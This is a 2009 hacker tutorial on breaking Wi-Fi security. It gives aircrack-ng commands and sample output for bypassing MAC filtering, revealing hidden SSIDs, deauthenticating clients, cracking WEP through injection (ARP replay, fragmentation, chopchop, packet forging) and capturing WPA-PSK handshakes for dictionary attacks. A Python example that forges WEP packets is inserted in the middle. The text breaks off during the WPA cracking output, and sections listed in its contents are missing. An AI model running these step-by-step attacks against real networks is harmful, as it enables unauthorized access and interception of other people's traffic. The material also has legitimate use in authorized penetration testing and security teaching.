|=--------------------------------------------------------------------=|
|=----------------=[ Wi-Foo Ninjitsu Exploitation ]=---------------=|
|=-----------------------=[ 24 February 2009 ]=-----------------------=|
|=---------------------=[ By CWH Underground ]=---------------------=|
|=--------------------------------------------------------------------=|
######
Info
######
Title : Wi-Foo Ninjitsu Exploitation
Author : JabAv0C && ZeQ3uL
Team : CWH Underground [www.milw0rm.com/author/1456]
Website : cwh.citec.us / www.citec.us
Date : 2009-02-24
##########
Contents
##########
[0x00] - Introduction
[0x01] - Security of Wireless network
[0x02] - Breaking the Simple Defenses
[0x02a] - Bypass MAC Filtering
[0x02b] - Discover Hidden SSID
[0x02c] - Sniffing information on the Air
[0x03] - Get closer with cracking tool
[0x03a] - Aircrack-ng suite
[0x03b] - Decrypt packet with airdecap-ng
[0x03c] - Decloak packet with airdecloak-ng
[0x03d] - AirCracking 101
[0x04] - Owned the WEP Key with Simple Technique (No Injection)
[0x04a] - Capturing method
[0x04b] - Cracking method
[0x05] - Owned the WEP Key with Advanced Technique (With Inject Method)
[0x05a] - Monitor Mode
[0x05b] - Fake Authentication
[0x05c] - Arp Replay Attack
[0x05d] - Fragmentation Attack
[0x05e] - Korek ChopChop Attack
[0x05f] - Packetforge
[0x05g] - ARP Request Replay with Interactive Attack
[0x05h] - Cracking WEP Key
[0x06] - Conclusion steps for cracking WEP
[0x07] - Owned the WPA-PSK/WPA2-PSK Key
[0x08] - Exploiting Wireless Enterprise (WPA-TLS/TTLS/PEAP)
[0x09] - Exploiting CISCO LEAP
[0x10] - Mass Exploit with Karmetasploit
[0x11] - References
[0x12] - Greetz To
#######################
[0x00] - Introduction
#######################
This paper introduces practical techniques used by hackers to break wireless security.
We recommend that the reader have a basic knowledge of wireless operation.
The paper contains 13 sections, but the practical content is in the 10 sections from 0x02 to 0x10.
Section 0x02 covers basic attacks on wireless networks. Section 0x03 describes the
tools used throughout this tutorial. Sections 0x04, 0x05 and 0x06 explain how to crack WEP.
Sections 0x07, 0x08 and 0x09 detail attacks on WPA and WPA2 (pre-shared key and enterprise). Section 0x10 describes
using Metasploit against wireless clients through a rogue AP.
#######################################
[0x01] - Security of Wireless Network
#######################################
A wireless network has a serious drawback compared with a wired network: it uses the air as its medium, so anyone within
radio range can capture and inject frames without physical access, which makes man-in-the-middle and other attacks possible.
Wireless security is therefore a major concern. The security standards in use today can be divided as follows:
- WEP
- WPA-PSK
- WPA2-PSK
- WPA-802.1x
- WPA2-802.1x
WEP is the original security standard for wireless networks, but it is easily cracked. WPA and WPA2 were introduced to increase wireless security
and fix the vulnerabilities in WEP. Both WPA and WPA2 come in a Pre-Shared Key mode and an 802.1x mode, intended for personal and enterprise
use respectively. In addition to these standards, there are other mechanisms meant to enhance wireless security, such as hidden SSIDs and MAC filtering. We
discuss breaking each of these standards and mechanisms in this tutorial and also cover other attacks a hacker can carry out against
wireless networks.
#######################################
[0x02] - Breaking the Simple Defenses
#######################################
++++++++++++++++++++++++++++++++
[0x02a] - Bypass MAC Filtering
++++++++++++++++++++++++++++++++
This is a basic security method: the access point stores the MAC addresses of the legitimate clients. When an authentication request
arrives, the access point compares the requesting MAC address with the stored list. If it matches,
authentication succeeds; otherwise it fails. The method is easy to bypass: MAC addresses travel in clear in every frame, and the attacker
can change the MAC address of the wireless card with a few commands.
We have a case study of bypassing MAC filtering. One day we had the chance to do a wireless penetration test of a company.
First, we used Kismet to discover the access points around the company, which told us the location of each access point. Then we ran airodump-ng
locked to the target channel to capture packets; fixing the channel improves the efficiency of airodump-ng. airodump-ng showed that
the access point used open authentication with no encryption. We tried to connect, but the access point refused
our authentication request, so we concluded that the network used MAC filtering. airodump-ng also showed clients associated with the access point.
We changed our MAC address to match one of the associated clients and tried again. This time everything worked and we were attached to the access point.
From there we were able to reach the company's internal network and run tools such as nmap, Nessus and exploits against internal servers. This is very dangerous.
++++++++++++++++++++++++++++++++
[0x02b] - Discover Hidden SSID
++++++++++++++++++++++++++++++++
In some environments the wireless administrator configures the access point to hide the SSID, so the attacker does not learn the SSID from the beacons
and cannot connect to the network. airodump-ng shows such a network as <length: ?>, where ? is the length of the SSID.
The SSID is still sent in clear when a legitimate client joins: it appears in the association request (and in probe requests and probe responses).
We can force a legitimate client to reconnect by sending de-authentication frames to it with aireplay-ng.
The command is:
#aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c zz:zz:zz:zz:zz:zz rausb0
21:56:47 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11
21:56:47 Sending 64 directed DeAuth. STMAC: [zz:zz:zz:zz:zz:zz] [ 0| 0 ACKs]
-a is the BSSID of the access point and -c is the MAC address of the client to kick off.
After receiving the de-authentication frames, the client re-authenticates and re-associates.
airodump-ng sees this exchange and fills in the SSID of the network.
++++++++++++++++++++++++++++++++++++++++++++
[0x02c] - Sniffing information on the Air
++++++++++++++++++++++++++++++++++++++++++++
This topic requires no advanced technique or deep knowledge. Many wireless networks use open authentication without
any encryption. The attacker only needs to sniff packets from the air and look for the credentials of protocols such as HTTP,
Telnet and FTP, which carry no encryption of their own, so usernames and passwords can be read directly from the captured packets.
airodump-ng (or any sniffer on a card in monitor mode) can be used to capture other people's data this way.
###########################################
[0x03] - Get closer with cracking tool
###########################################
We recommend using Aircrack-ng. Aircrack-ng is an 802.11 WEP and WPA-PSK key cracking program that can recover keys once enough data packets
have been captured. It implements the standard FMS attack along with some optimizations like the KoreK attacks, as well as the newer PTW attack,
making it much faster than other WEP cracking tools. Aircrack-ng is in fact a suite of tools for auditing wireless networks.
+++++++++++++++++++++++++++++
[0x03a] - Aircrack-ng suite
+++++++++++++++++++++++++++++
There are four tools in the aircrack-ng suite which play an important role in this tutorial.
- airodump-ng: used for capturing packets
The card must already be in monitor mode (put it there with airmon-ng first, see section 0x05a); run airodump-ng locked to the channel
of the target so that every frame on it is captured. Injection with aireplay-ng needs the card in monitor mode as well.
- aireplay-ng: used for injection
o de-authentication: sends de-authentication frames to an associated client
o fake authentication: performs a fake authentication/association with the access point
o interactive packet replay: lets us choose the packet to replay
o arp replay: performs the ARP request replay attack automatically
o Korek chopchop: recovers a keystream with the chopchop technique
o fragment: recovers a keystream with the fragmentation technique
- packetforge-ng: used to create packets
- aircrack-ng: used for recovering the key
More detail: http://aircrack-ng.org/doku.php#aircrack-ng_suite1
+++++++++++++++++++++++++++++++++++++++++++
[0x03b] - Decrypt packet with airdecap-ng
+++++++++++++++++++++++++++++++++++++++++++
Once we have the WEP or WPA key, we sometimes want to decrypt the captured packets. The Aircrack team already
provides a tool for this, called "airdecap-ng". For WEP, give the key with -w; for WPA/WPA2, give the ESSID with -e and the passphrase with -p:
#airdecap-ng -w 0011223344 -b xx:xx:xx:xx:xx:xx workshop-01.cap
or
#airdecap-ng -e Workshop -p TheFuckinWPAKey workshop-02.cap
The output of these commands is a file ending in "-dec.cap".
PS. for WPA/WPA2, airdecap-ng can only decrypt the traffic of a client whose four-way handshake is in the capture file, because the session keys are derived from that handshake.
+++++++++++++++++++++++++++++++++++++++++++++
[0x03c] - Decloak packet with airdecloak-ng
+++++++++++++++++++++++++++++++++++++++++++++
Cloaking is a technique meant to disrupt WEP key cracking. The defender injects packets encrypted with random WEP keys
into the network; these packets are called "chaff". If the attacker captures them and feeds them to the cracker, the result will be wrong or no key
will be found. The Aircrack team developed a tool to deal with this technique, called "airdecloak-ng".
#airdecloak-ng --bssid xx:xx:xx:xx:xx:xx -i workshop-01.cap
This command returns two files:
- workshop-01-filtered.cap: the packets from the given BSSID with the chaff removed (this is the file to give to aircrack-ng)
- workshop-01-cloaked.cap: the packets from the given BSSID identified as chaff
++++++++++++++++++++++++++++
[0x03d] - AirCracking 101
++++++++++++++++++++++++++++
PTW Attack (-z)
(aircrack-ng -z capture.cap). Only works for 64/128-bit WEP and only uses ARP request/reply packets, so capture full packets with airodump-ng (not IVs only).
Dictionary Attack (WPA/WPA2 passphrases)
(aircrack-ng -w pass.lst *.cap)
Fudge Factor (-f)
The fudge factor applies to the FMS/KoreK attack, not to PTW. Once you have about 2 million IVs and the key is still not found, try "-f 4" and retry, adding 4 to the fudge factor each time.
** All the while, keep collecting data. Remember the golden rule: "The more IVs, the better".
#################################################################
[0x04] - Owned the WEP Key with Simple Technique (No Injection)
#################################################################
WEP is a dead method for protecting a network from unauthorized access. There are several ways to crack a WEP key.
First of all, we need a wireless device that supports monitor mode and packet injection.
Then we prepare the cracking tools; we use aircrack-ng on BackTrack 3 final inside VMware (with a USB adapter, the rt73-based rausb0 used below,
since a virtual machine cannot use the host's built-in card in monitor mode).
Let us clarify the concept of cracking WEP.
The main idea is to collect as many encrypted packets (each carrying a fresh IV) as fast as we can, then use them to recover the WEP key.
This gives two situations:
1. The network has high traffic.
2. The network has low traffic.
What is the difference? In the first case we only need airodump-ng to collect packets and then crack the key; in the second case
we have to inject packets to make the access point generate more traffic. We first introduce the capture and cracking method,
then the injection method, which is needed only on low-traffic networks.
++++++++++++++++++++++++++++
[0x04a] - Capturing method
++++++++++++++++++++++++++++
First, the way to collect packets. With the PTW attack, around 50,000 IVs are usually enough for a 64-bit WEP key and
around 150,000 IVs for a 128-bit key (more never hurts).
The command for collecting packets is
#airodump-ng -c 11 -w workshop rausb0
(-c 11 locks the card to the channel of the target; -w workshop is the prefix of the capture file.)
------------------------------------------------------------------------------------------
[ CH 11 ][ Elapsed: 16 mins ][ 2009-02-23 21:21 ][ Decloak: xx:xx:xx:xx:xx:xx
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
xx:xx:xx:xx:xx:xx 77 94 10905 11054 0 11 54. WEP WEP OPN Workshop
BSSID STATION PWR Rate Lost Packets Probes
xx:xx:xx:xx:xx:xx yy:yy:yy:yy:yy:yy 85 54-54 0 7747
------------------------------------------------------------------------------------------
We get the file "workshop-01.cap", used for cracking the key later.
The #Data column shows how many data packets have been captured; roughly 90% of them carry an IV we can use.
+++++++++++++++++++++++++++
[0x04b] - Cracking method
+++++++++++++++++++++++++++
After we collected enough encrypted packets (IV packets), we use aircrack-ng for recovering the key.
#aircrack-ng -b xx:xx:xx:xx:xx:xx workshop-01.cap
-b xx:xx:xx:xx:xx:xx selects the target access point by its MAC address (BSSID)
The successful cracking result is following:
---------------------------------------------------------------
Opening workshop-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 50417 ivs.
KEY FOUND! [ 00:11:22:33:44 ]
Decrypted correctly: 100%
---------------------------------------------------------------
#########################################################################
[0x05] - Owned the WEP Key with Advanced Technique (With Inject Method)
#########################################################################
This method is not necessary on a high-traffic network, but it is very important on a low-traffic one. The idea is that
we inject a packet that forces the access point to send a new packet back into the air, and every new packet carries a new IV.
Thinking about it carefully, the source MAC address must be associated with the access point, the packet must go from a client to the access point,
and the packet must cause the access point to produce a response or relay another packet; normally we pick a packet whose destination is the broadcast address,
because the access point re-encrypts it with a fresh IV when it relays it to the wireless side.
The requirements for a packet chosen for injection are:
- The source MAC address is associated with the access point (we can arrange this with fake authentication).
- It is sent from a client to the access point (the "To DS" flag is set to 1).
- The destination MAC address is broadcast (FF:FF:FF:FF:FF:FF).
The well-known packet that meets all requirements is the broadcast ARP request. aireplay-ng from the aircrack-ng suite has an option to perform the ARP replay attack: capture an ARP request and replay it to the access point so that it generates new IVs. But the network may have no ARP request at that moment, so the injection technique splits into 2 scenarios:
- The network has ARP requests.
- The network has no ARP requests.
Whichever case we face, the important thing is that we must inject with a MAC address that is associated with the access point.
We have two choices: change our MAC address to that of an already-associated client, or perform fake authentication.
++++++++++++++++++++++++
[0x05a] - Monitor Mode
++++++++++++++++++++++++
Use airmon-ng to put your wifi card into monitor mode so that it can capture every frame and inject packets.
#airmon-ng start wlan0 11
This puts wlan0 into monitor mode on channel 11. We must specify the same channel as the target AP. (With mac80211 drivers airmon-ng creates a
separate monitor interface, typically mon0; use whatever interface name it reports in the following commands.)
+++++++++++++++++++++++++++++++
[0x05b] - Fake Authentication
+++++++++++++++++++++++++++++++
We can do fake authentication with the following command.
#aireplay-ng -1 0 -a xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy rausb0
-a xx:xx:xx:xx:xx:xx is the MAC address of the access point
-h yy:yy:yy:yy:yy:yy is the MAC address of our wireless card
If it succeeds, our MAC address is associated with the access point.
The successful result look like:
------------------------------------------
00:00:00 Sending Authentication Request
00:00:00 Authentication successful
00:00:00 Sending Association Request
00:00:00 Association successful :-)
------------------------------------------
After succeeding in fake authentication, we have to determine what type of network we are faced with and pick the appropriate steps to deal with it.
+++++++++++++++++++++++++++++
[0x05c] - Arp Replay Attack
+++++++++++++++++++++++++++++
We can run the ARP replay attack with the following command.
#aireplay-ng -3 -b xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy rausb0
-b xx:xx:xx:xx:xx:xx is the MAC address of the access point
-h yy:yy:yy:yy:yy:yy is the MAC address of our wireless card
aireplay-ng waits for an ARP request and replays it automatically.
Once it has found an ARP request, the output looks like this:
------------------------------------------------------------------------------------
21:06:20 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11
Saving ARP requests in replay_arp-0223-210620.cap
You should also start airodump-ng to capture replies.
Read 1379 packets (got 30 ARP requests and 0 ACKs), sent 3468 packets...(499 pps)
------------------------------------------------------------------------------------
** In some cases no ARP request appears on the network, so the normal ARP replay attack cannot be used.
We then have to recover a keystream from a captured packet, use the keystream to forge an ARP request, and replay that to the access point
to generate new IVs. There are two ways to recover a keystream, the "chopchop attack" and the "fragmentation attack".
Both are performed with aireplay-ng.
++++++++++++++++++++++++++++++++
[0x05d] - Fragmentation Attack
++++++++++++++++++++++++++++++++
The fragmentation attack recovers a keystream of up to 1500 bytes, so we can use it to forge a packet
of up to 1500 bytes. The command for the fragmentation attack is
#aireplay-ng -5 -b xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy rausb0
The system responds with this:
-------------------------------------------------------------------------------
21:21:07 Waiting for beacon frame (BSSID: 00:1B:2F:3D:CB:D6) on channel 11
21:21:07 Waiting for a data packet...
Size: 90, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:1B:2F:3D:CB:D6
Dest. MAC = 00:1A:73:37:E2:A3
Source MAC = 00:1B:2F:3D:CB:D6
0x0000: 8842 2c00 001a 7337 e2a3 001b 2f3d cbd6 .B,...s7..../=..
0x0010: 001b 2f3d cbd6 20df 0000 b168 ff00 2872 ../=.. ....h..(r
0x0020: 7547 d03f 70d7 2d29 1397 7d3d ac16 382a uG.?p.-)..}=..8*
0x0030: f20f 77fb ca63 13e0 f7a6 9228 ddc0 8263 ..w..c.....(...c
0x0040: 5315 a328 87cb 0d4a b36a e5be 93c7 307a S..(...J.j....0z
0x0050: 7bc2 18d7 2df5 94f2 5aed {...-...Z.
Use this packet ?
-------------------------------------------------------------------------------
We have to answer "y"
-----------------------
Use this packet ? y
-----------------------
And the successful process looks like this:
----------------------------------------------------------------------------------
Saving chosen packet in replay_src-0223-212107.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0223-212107.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
----------------------------------------------------------------------------------
+++++++++++++++++++++++++++++++++
[0x05e] - Korek ChopChop Attack
+++++++++++++++++++++++++++++++++
KoreK developed a clever attack called chopchop. It needs only one encrypted packet, which it decrypts byte by byte without knowing the key,
giving the keystream for that packet's IV; the keystream is then used to forge an ARP request, which is replayed to the access point.
We run the chopchop attack with this command.
#aireplay-ng -4 -b xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy rausb0
aireplay-ng picks a packet to decrypt and asks whether to use it; any packet with the BSSID of our target will do.
The response from the command looks like this:
--------------------------------------------------------------------------------------
21:12:42 Waiting for beacon frame (BSSID: 00:1B:2F:3D:CB:D6) on channel 11
Size: 90, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:1B:2F:3D:CB:D6
Dest. MAC = 00:1A:73:37:E2:A3
Source MAC = 00:1B:2F:3D:CB:D6
0x0000: 8842 2c00 001a 7337 e2a3 001b 2f3d cbd6 .B,...s7..../=..
0x0010: 001b 2f3d cbd6 6084 0000 55bc e600 2e4e ../=..`...U....N
0x0020: a334 a2b3 fc4c fe8a 2cf4 f548 0f27 90d0 .4...L..,..H.'..
0x0030: 767d 2725 bedd 62ec 252e 8b4b d2d3 a8a0 v}'%..b.%..K....
0x0040: bb3f 4874 c821 c402 467d f70f 2a56 43a7 .?Ht.!..F}..*VC.
0x0050: b09b f0f1 8b04 fc1c 0b72 .........r
Use this packet ?
----------------------------------------------------------------------------------------
And we will answer by typing "y" like this
---------------------
Use this packet ? y
---------------------
And then the system do the decrypting
---------------------------------------------------------------------------------------
Saving chosen packet in replay_src-0223-211242.cap
Offset 87 ( 3% done) | xor = 4E | pt = 3C | 64 frames written in 1097ms
Offset 86 ( 5% done) | xor = 16 | pt = 1D | 119 frames written in 2029ms
Offset 85 ( 7% done) | xor = 63 | pt = 7F | 146 frames written in 2476ms
Offset 84 ( 8% done) | xor = 97 | pt = 6B | 239 frames written in 4068ms
Offset 83 (10% done) | xor = 0E | pt = 0A | 228 frames written in 3865ms
Offset 82 (12% done) | xor = 86 | pt = 0D | 273 frames written in 4646ms
Offset 81 (14% done) | xor = C9 | pt = 38 | 2 frames written in 35ms
Offset 80 (16% done) | xor = C4 | pt = 34 | 185 frames written in 3145ms
Offset 79 (17% done) | xor = BB | pt = 20 | 250 frames written in 4253ms
Offset 78 (19% done) | xor = F7 | pt = 47 | 97 frames written in 1649ms
Offset 77 (21% done) | xor = E9 | pt = 4E | 247 frames written in 4196ms
Offset 76 (23% done) | xor = 12 | pt = 51 | 237 frames written in 4029ms
Offset 75 (25% done) | xor = 56 | pt = 00 | 52 frames written in 884ms
Offset 74 (26% done) | xor = 2A | pt = 00 | 431 frames written in 7326ms
Offset 73 (28% done) | xor = 7E | pt = 71 | 232 frames written in 3946ms
Offset 72 (30% done) | xor = 1C | pt = EB | 123 frames written in 2093ms
Offset 71 (32% done) | xor = B6 | pt = CB | 9 frames written in 141ms
Offset 70 (33% done) | xor = BC | pt = FA | 256 frames written in 4365ms
Offset 69 (35% done) | xor = 1A | pt = 18 | 179 frames written in 3041ms
Offset 68 (37% done) | xor = 94 | pt = 50 | 118 frames written in 2002ms
Offset 67 (39% done) | xor = 50 | pt = 71 | 65 frames written in 1109ms
Offset 66 (41% done) | xor = 9D | pt = 55 | 172 frames written in 2921ms
Offset 65 (42% done) | xor = 3C | pt = 48 | 196 frames written in 3338ms
Offset 64 (44% done) | xor = BE | pt = F6 | 281 frames written in 4763ms
Offset 63 (46% done) | xor = 81 | pt = BE | 61 frames written in 1051ms
Offset 62 (48% done) | xor = AC | pt = 17 | 456 frames written in 7748ms
Offset 61 (50% done) | xor = D2 | pt = 72 | 73 frames written in 1231ms
Offset 60 (51% done) | xor = 9C | pt = 34 | 428 frames written in 7288ms
Offset 59 (53% done) | xor = 64 | pt = B7 | 120 frames written in 2036ms
Offset 58 (55% done) | xor = 87 | pt = 55 | 188 frames written in 3200ms
Offset 57 (57% done) | xor = 0C | pt = 47 | 119 frames written in 2024ms
Offset 56 (58% done) | xor = 8C | pt = 07 | 124 frames written in 2095ms
Offset 55 (60% done) | xor = 2C | pt = 02 | 364 frames written in 6197ms
Offset 54 (62% done) | xor = 25 | pt = 00 | 136 frames written in 2315ms
Offset 53 (64% done) | xor = 44 | pt = A8 | 142 frames written in 2410ms
Offset 52 (66% done) | xor = A2 | pt = C0 | 102 frames written in 1733ms
Offset 51 (67% done) | xor = C9 | pt = 14 | 19 frames written in 329ms
Offset 50 (69% done) | xor = D5 | pt = 6B | 183 frames written in 3110ms
Offset 49 (71% done) | xor = 0B | pt = 2E | 62 frames written in 1048ms
Offset 48 (73% done) | xor = E8 | pt = CF | 18 frames written in 306ms
Offset 47 (75% done) | xor = FB | pt = 86 | 29 frames written in 496ms
Offset 46 (76% done) | xor = 4B | pt = 3D | 100 frames written in 1702ms
Offset 45 (78% done) | xor = D6 | pt = 06 | 77 frames written in 1312ms
Offset 44 (80% done) | xor = FD | pt = 6D | 226 frames written in 3828ms
Offset 43 (82% done) | xor = 27 | pt = 00 | 117 frames written in 2001ms
Offset 42 (83% done) | xor = 4F | pt = 40 | 38 frames written in 641ms
Offset 41 (85% done) | xor = 1C | pt = 54 | 354 frames written in 6020ms
Offset 40 (87% done) | xor = 20 | pt = D5 | 277 frames written in 4714ms
Offset 39 (89% done) | xor = C4 | pt = 30 | 113 frames written in 1918ms
Offset 38 (91% done) | xor = 2C | pt = 00 | 485 frames written in 8244ms
Offset 37 (92% done) | xor = 8A | pt = 00 | 231 frames written in 3933ms
The AP appears to drop packets shorter than 37 bytes.
Enabling standard workaround: IP header re-creation.
This doesn't look like an IP packet, try another one.
Warning: ICV checksum verification FAILED! Trying workaround.
The AP appears to drop packets shorter than 40 bytes.
Enabling standard workaround: IP header re-creation.
Saving plaintext in replay_dec-0223-211410.cap
Saving keystream in replay_dec-0223-211410.xor
Completed in 21s (2.48 bytes/s)
---------------------------------------------------------------------------------------
The result of this process is a .xor file containing the keystream (PRGA) and a .cap file containing the decrypted packet.
+++++++++++++++++++++++
[0x05f] - Packetforge
+++++++++++++++++++++++
Create an encrypted packet from the PRGA (the .xor keystream file) obtained with chopchop or fragmentation.
#packetforge-ng -0 -a xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-0223-211410.xor -w arp
-0 builds an ARP request; -k is the target IP and -l the source IP (255.255.255.255 is relayed by most access points); -y is the keystream file; -w is the output file.
The result is:
----------------------
Wrote packet to: arp
----------------------
This command gives us an ARP request packet in the file named "arp".
++++++++++++++++++++++++++++++++++++++++++++++++++++++
[0x05g] - ARP Request Replay with Interactive Attack
++++++++++++++++++++++++++++++++++++++++++++++++++++++
We use aireplay-ng to inject the ARP request packet towards the access point with the following command.
#aireplay-ng -2 -r arp rausb0
The response will look like:
-----------------------------------------------------------------------------------
Size: 68, FromDS: 0, ToDS: 1 (WEP)
BSSID = 00:1B:2F:3D:CB:D6
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:21:27:C0:07:71
0x0000: 0841 0201 001b 2f3d cbd6 0021 27c0 0771 .A..../=...!'..q
0x0010: ffff ffff ffff 8001 55bc e600 2e4e a334 ........U....N.4
0x0020: a2b3 fc4a bb8b 24c4 2618 4f26 fdf7 6c3b ...J..$.&.O&..l;
0x0030: ef7a 2a36 5dbb 252c 8c0c 8764 632d 537e .z*6].%,...dc-S~
0x0040: 66bf 700e f.p.
Use this packet ?
-----------------------------------------------------------------------------------
We have to answer "y"
---------------------
Use this packet ? y
---------------------
aireplay-ng starts injecting the packet.
-------------------------------------------------------
Saving chosen packet in replay_src-0223-211755.cap
You should also start airodump-ng to capture replies.
Sent 1200 packets...(499 pps)
-------------------------------------------------------
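The steps from 0x05d to 0x05g all rest on one property of WEP: RC4 is seeded with IV || key, so whoever knows the keystream of one IV can encrypt anything of the same length under that IV, ICV included, without the key. The following added example (not part of the original paper and not aircrack-ng code) implements WEP in a few lines and then plays the attacker: it takes the keystream out of one captured packet, the way chopchop and fragmentation produce the .xor file, and forges the same broadcast ARP request that packetforge-ng -0 -k 255.255.255.255 -l 255.255.255.255 builds. The key 00:11:22:33:44, the IV 55:bc:e6 and the MAC addresses are taken from the dumps in this paper; the IP addresses are made up, and for brevity the attacker is assumed to know the full plaintext of the captured ARP request (the real attacks bootstrap from the 8 fixed LLC/SNAP bytes).

```python
import struct
import zlib


def rc4_keystream(key, length):
    """Plain RC4 (KSA + PRGA). WEP seeds it with the 3-byte IV followed by the secret key."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xff
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xff
        j = (j + S[i]) & 0xff
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xff])
    return bytes(out)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data):
    """WEP integrity check value: a plain CRC-32, so it is linear and offers no protection."""
    return struct.pack("<I", zlib.crc32(data) & 0xffffffff)


def wep_encrypt(key, iv, plaintext):
    """Legitimate side: body = IV | key id | RC4(IV||key) xor (plaintext | ICV)."""
    return iv + b"\x00" + xor(plaintext + icv(plaintext), rc4_keystream(iv + key, len(plaintext) + 4))


def wep_decrypt(key, body):
    """What the access point does on receipt; returns (plaintext, icv_ok)."""
    iv, ct = body[:3], body[4:]
    pt_icv = xor(ct, rc4_keystream(iv + key, len(ct)))
    pt = pt_icv[:-4]
    return pt, pt_icv[-4:] == icv(pt)


def arp_request(sender_mac, sender_ip, target_ip):
    """LLC/SNAP + ARP request, 8 + 28 = 36 bytes: the plaintext packetforge-ng -0 builds."""
    llc_snap = bytes.fromhex("aaaa030000000806")
    arp = struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, 1, sender_mac, sender_ip, b"\x00" * 6, target_ip)
    return llc_snap + arp


def recover_keystream(body, known_plaintext):
    """Attacker side, no key needed: keystream = ciphertext xor (known plaintext | ICV).
    This is the content of the .xor file written by chopchop or fragmentation."""
    iv, ct = body[:3], body[4:]
    return iv, xor(ct, known_plaintext + icv(known_plaintext))


def forge_packet(iv, keystream, plaintext):
    """packetforge-ng: re-encrypt a chosen plaintext under the same IV with the recovered keystream."""
    if len(plaintext) + 4 > len(keystream):
        raise ValueError("keystream too short for this packet")
    return iv + b"\x00" + xor(plaintext + icv(plaintext), keystream)


WEP_KEY = bytes.fromhex("0011223344")   # the key from this paper; the attacker never learns it here


def run_demo():
    """Capture one ARP request from a client, then inject a forged one the AP accepts."""
    client_mac = bytes.fromhex("002127c00771")
    legit = arp_request(client_mac, bytes([192, 168, 1, 10]), bytes([192, 168, 1, 1]))
    captured = wep_encrypt(WEP_KEY, bytes.fromhex("55bce6"), legit)      # only this body is observed
    iv, keystream = recover_keystream(captured, legit)                     # assumption: plaintext known
    ours = arp_request(bytes.fromhex("00c0ca123456"), b"\xff" * 4, b"\xff" * 4)   # -k/-l 255.255.255.255
    forged = forge_packet(iv, keystream, ours)
    pt, accepted = wep_decrypt(WEP_KEY, forged)                            # AP-side ICV check
    _, other_iv_accepted = wep_decrypt(WEP_KEY, forge_packet(b"\x01\x02\x03", keystream, ours))
    return {
        "frame_len": 24 + len(forged),             # 802.11 header + IV/keyid + 36 + ICV
        "accepted": accepted and pt == ours,
        "other_iv_accepted": other_iv_accepted,     # keystream is bound to its IV
    }


if __name__ == "__main__":
    print(run_demo())
```

The forged frame is 24 + 4 + 36 + 4 = 68 bytes, the same "Size: 68" aireplay-ng reports above, and the access point relays it under a fresh IV every time it is replayed, which is what feeds the PTW attack. The last check shows why the .xor file is only useful together with its IV.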
++++++++++++++++++++++++++++
[0x05h] - Cracking WEP Key
++++++++++++++++++++++++++++
After we have collected enough encrypted packets (IVs), we use aircrack-ng to recover the key.
#aircrack-ng -z capture1.cap (PTW attack)
The successful cracking result is following:
---------------------------------------------------------------
Opening capture1.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 50417 ivs.
KEY FOUND! [ 00:11:22:33:44 ]
Decrypted correctly: 100%
---------------------------------------------------------------
##############################################
[0x06] - Conclusion Scripts for Cracking WEP
##############################################
Note: $AP is the access point MAC address
$WIFI is the MAC address of our wifi card
- airmon-ng start wlan0 11 (monitor mode must be on the channel of the target)
- airodump-ng -c 11 -w capture1 wlan0 (writes capture1-01.cap)
- aireplay-ng -1 0 -e linksys -a $AP -h $WIFI wlan0
- aireplay-ng -4 -b $AP -h $WIFI wlan0
If it does not work, try #aireplay-ng -5 -b $AP -h $WIFI wlan0
- packetforge-ng -0 -a $AP -h $WIFI -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-03.xor -w arp-request
- aireplay-ng -2 -r arp-request wlan0
- aircrack-ng -z capture1-01.cap
** This sequence also works against a clientless access point: fake authentication supplies the associated MAC address and chopchop/fragmentation supply the keystream, so no legitimate client is needed.
#########################################
[0x07] - Owned the WPA-PSK/WPA2-PSK Key
#########################################
PSK stands for Pre-Shared Key. WPA-PSK and WPA2-PSK were designed to fix the vulnerabilities of WEP: the per-packet keys are derived properly,
so the statistical attacks used against WEP do not apply and collecting IVs is useless. The only way to recover a WPA-PSK or WPA2-PSK passphrase is to capture the
four-way handshake and run a dictionary attack against it: the passphrase and SSID give the pairwise master key, and the MIC in the handshake lets us test each candidate offline.
The idea is therefore to capture the four-way handshake. We can do this by de-authenticating an associated client, which
forces it to re-authenticate, and the four-way handshake occurs during that reconnection. The de-authentication command is:
#aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c zz:zz:zz:zz:zz:zz rausb0
21:56:47 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11
21:56:47 Sending 64 directed DeAuth. STMAC: [zz:zz:zz:zz:zz:zz] [ 0| 0 ACKs]
We assume that airodump-ng captured this exchange in workshop-02.cap. We then crack it with aircrack-ng:
#aircrack-ng -w wordlist --bssid xx:xx:xx:xx:xx:xx workshop-02.cap
The successful result is following.
--------------------------------------------------------------------------------
Opening workshop-02.cap
Read 252 packets.
# BSSID ESSID Encryption
1 xx:xx:xx:xx:xx:xx Workshop WPA (1 handshake)
Choosing first network as target.
Opening workshop-02.cap
Reading packets, please wait...
Aircrack-ng 1.0 rc1 r1085
[00:00:00] 0 keys tested (0.00 k/s)
